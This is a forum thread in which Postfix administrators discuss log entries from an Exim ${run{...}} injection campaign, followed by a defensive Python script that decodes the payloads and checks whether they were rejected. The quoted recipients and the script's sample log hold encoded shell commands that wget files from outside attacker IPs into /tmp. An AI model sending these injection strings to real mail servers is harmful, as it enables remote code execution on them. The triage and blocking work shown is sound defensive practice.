ipic (Guru) | Joined: 29 Dec 2003 | Posts: 433 | Location: UK
Posted: Thu Jun 20, 2019 8:04 am
Post subject: What is this address in HELO trying to do (looks like code)
This turned up in my Postfix log last night:

```
root+${run{x2Fbinx2Fsht-ctx22wgetx20213.227.155.101x2ftmpx2f81.187.207.23x22}}@localhost
root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f81.187.207.23x22}}@localhost
```
Has anyone seen this before?
Looks like some form of injection attack. Any advice on how to check if it worked?
81.187.207.23 is my host address.
I have blocked (in iptables) the addresses 213.227.155.101 and 64.50.180.45
My Postfix is stable and up to date:

```
ian ~ # eix -I postfix
[I] mail-mta/postfix
Available versions: ~*2.10.9 3.2.4 3.3.1-r1 3.3.4 ~3.4.5 ~3.4.5-r1 [M]~3.5_pre20190518 {+berkdb cdb doc dovecot-sasl +eai hardened ldap ldap-bind libressl lmdb mbox memcached mysql nis pam postgres sasl selinux sqlite ssl vda}
Installed versions: 3.3.4(08:34:45 28/05/19)(berkdb eai pam ssl -cdb -dovecot-sasl -hardened -ldap -ldap-bind -libressl -lmdb -mbox -memcached -mysql -nis -postgres -sasl -selinux -sqlite)
Homepage: http://www.postfix.org/
Description: A fast and secure drop-in replacement for sendmail
ian ~ #
```

Thanks
freke (Veteran) | Joined: 23 Jan 2003 | Posts: 1051 | Location: Somewhere in Denmark
Posted: Thu Jun 20, 2019 3:29 pm
Thanks - just noticed a lot of those in my logs, too:

```
Jun 19 12:29:43 mail postfix/smtpd[11328]: NOQUEUE: reject: RCPT from unknown[45.55.94.254]: 450 4.2.0 <root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f90.184.239.156x22}}@vlh.dk>: Recipient address rejected: Greylisted for 300 seconds; from=<support@service.com> to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f90.184.239.156x22}}@vlh.dk> proto=SMTP helo=<service.com>
Jun 19 18:18:16 mail postfix/smtpd[13558]: NOQUEUE: reject: RCPT from unknown[107.182.225.42]: 450 4.2.0 <root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f90.184.239.158x22}}@vlh.dk>: Recipient address rejected: Greylisted for 300 seconds; from=<support@service.com> to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f90.184.239.158x22}}@vlh.dk> proto=SMTP helo=<service.com>
```
I found this https://security.stackexchange.com/questions/212077/unusual-mail-headers-evidence-of-an-attempted-attack-have-i-been-pwned - looks like it's something to do with EXIM-servers.
Looks to me like it's trying to wget something from the ip to the mail-hosts tmp-dir and then run it.
What I notice though is that they're not actually connecting to my MX-ip - but some other IPs that I've got - but they're redirected to my mail-server because of the port-number....
[EDIT]
And this https://forums.gentoo.org/viewtopic-t-1097702.html :)
ipic (Guru) | Joined: 29 Dec 2003 | Posts: 433 | Location: UK
Posted: Thu Jun 20, 2019 4:24 pm
Thanks for the references. It's quite exciting to be in on a current attack, in a weird way
In my case the mail got no further than Postfix (i.e. not delivered) since it failed one of the checks I've applied:
```
Recipient address rejected: need fully-qualified address
```
A long time ago I enabled the "+" option when testing out multiple mail drops (I forget why), so I went off to check that this was no longer enabled. Not sure if this would stop any issue should it have applied to Postfix. But I remember one of the cardinal security rules from my old job: "Never enable something unless it is known to be needed".
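The thread's two practical questions are "what is that address doing" and "how do I check if it worked" on a Postfix box. The following triage script is an added example, not code from this thread and not part of Postfix or Exim. It scans smtpd log lines for a `${run{...}}` recipient, records whether Postfix rejected the message and why (the greylisting and "need fully-qualified address" rejections quoted above both count as "never queued"), decodes the `xNN` tokens so the payload can be read for triage, and collects the hosts the payload would fetch from so they can be blocked or reported. It assumes the `xNN` tokens are `\xNN` escapes whose backslash was lost in transit, and that the stray `t` characters around `-c` are `\t` escapes mangled the same way; the sample log is constructed from the extracts posted above, with a made-up 203.0.113.9 client and timestamps.

```python
"""Triage Postfix smtpd log lines that carry an Exim-style ${run{...}} recipient."""
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# Constructed sample log, modelled on the extracts quoted in this thread.
# The 45.55.94.254 client, the fetch hosts, the vlh.dk/localhost recipients
# and the reject texts come from the thread; 203.0.113.9 (documentation
# range) and the timestamps on the last two lines are made up.
SAMPLE_LOG = (
    "Jun 19 12:29:43 mail postfix/smtpd[11328]: NOQUEUE: reject: RCPT from "
    "unknown[45.55.94.254]: 450 4.2.0 <root+${run{x2Fbinx2Fsht-ctx22wgetx20"
    "64.50.180.45x2ftmpx2f90.184.239.156x22}}@vlh.dk>: Recipient address "
    "rejected: Greylisted for 300 seconds; from=<support@service.com> "
    "to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f"
    "90.184.239.156x22}}@vlh.dk> proto=SMTP helo=<service.com>\n"
    "Jun 20 02:11:07 mail postfix/smtpd[11400]: NOQUEUE: reject: RCPT from "
    "unknown[203.0.113.9]: 504 5.5.2 <root+${run{x2Fbinx2Fsht-ctx22wgetx20"
    "213.227.155.101x2ftmpx2f81.187.207.23x22}}@localhost>: Recipient address "
    "rejected: need fully-qualified address; from=<support@service.com> "
    "to=<root+${run{x2Fbinx2Fsht-ctx22wgetx20213.227.155.101x2ftmpx2f"
    "81.187.207.23x22}}@localhost> proto=SMTP helo=<service.com>\n"
    "Jun 20 02:12:00 mail postfix/smtpd[11400]: connect from unknown[203.0.113.9]\n"
)

RUN_RE = re.compile(r"\$\{run\{(?P<body>[^{}]*)\}\}")        # the Exim expansion
HEX_RE = re.compile(r"x([0-9A-Fa-f]{2})")                    # xNN -> one byte (assumed \xNN)
TS_RE = re.compile(r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d)")
CLIENT_RE = re.compile(r"from \S+?\[(?P<ip>[^\]]+)\]")        # "RCPT from host[ip]"
RCPT_ADDR_RE = re.compile(r"<(?P<addr>[^<>]*\$\{run\{[^<>]*)>")
REASON_RE = re.compile(r"Recipient address rejected: (?P<why>[^;]+)")
# After decoding, the download host/path the payload would fetch with wget or curl.
FETCH_RE = re.compile(r"\b(?:wget|curl)\b\D*?(?P<host>\d{1,3}(?:\.\d{1,3}){3})(?P<path>/[^\s\"']*)?")


@dataclass
class Finding:
    timestamp: str
    client_ip: str          # SMTP client that sent the RCPT
    recipient: str          # the raw injected recipient address
    decoded: str            # ${run{...}} body with xNN tokens decoded
    fetch_host: Optional[str]
    fetch_path: Optional[str]
    rejected: bool          # True when smtpd logged NOQUEUE: reject
    reason: str


def decode_payload(body: str) -> str:
    """Turn xNN tokens back into characters (x2F -> '/', x20 -> ' ', x22 -> '"').
    The leftover 't' around '-c' is assumed to be a \\t escape minus its backslash."""
    return HEX_RE.sub(lambda m: chr(int(m.group(1), 16)), body)


def scan(log_text: str) -> List[Finding]:
    """One Finding per log line that carries a ${run{...}} recipient."""
    findings: List[Finding] = []
    for line in log_text.splitlines():
        run = RUN_RE.search(line)
        if not run:
            continue
        decoded = decode_payload(run.group("body"))
        ts, client, addr = TS_RE.match(line), CLIENT_RE.search(line), RCPT_ADDR_RE.search(line)
        fetch, reason = FETCH_RE.search(decoded), REASON_RE.search(line)
        rejected = "NOQUEUE: reject:" in line
        findings.append(Finding(
            timestamp=ts.group("ts") if ts else "",
            client_ip=client.group("ip") if client else "",
            recipient=addr.group("addr") if addr else "",
            decoded=decoded,
            fetch_host=fetch.group("host") if fetch else None,
            fetch_path=fetch.group("path") if fetch else None,
            rejected=rejected,
            # A ${run{ recipient on a line that is NOT a smtpd rejection (e.g. a
            # qmgr/local delivery line) means the address got past smtpd: investigate.
            reason=reason.group("why").strip() if reason else
                   ("rejected (no reason text)" if rejected else "NOT REJECTED - investigate"),
        ))
    return findings


def fetch_hosts(findings: List[Finding]) -> Set[str]:
    """Hosts the payloads would download from; candidates for blocking/reporting."""
    return {f.fetch_host for f in findings if f.fetch_host}


def main() -> None:
    findings = scan(SAMPLE_LOG)
    for f in findings:
        status = "rejected" if f.rejected else "PASSED SMTPD"
        print(f"{f.timestamp} client={f.client_ip} {status}: {f.reason}")
        print(f"    decoded: {f.decoded}")
        print(f"    fetch:   {f.fetch_host}{f.fetch_path or ''}")
    print("hosts to block/report:", ", ".join(sorted(fetch_hosts(findings))))


if __name__ == "__main__":
    main()
```

Run it over a real `/var/log/mail.log` instead of `SAMPLE_LOG` and look for any finding whose `rejected` flag is false: on Postfix the `${run{...}}` text is just an odd local part, so the thing to confirm is that every such recipient was rejected at RCPT time (greylisting, `reject_non_fqdn_recipient`, or whatever restriction fired) rather than queued and handed to a local delivery agent.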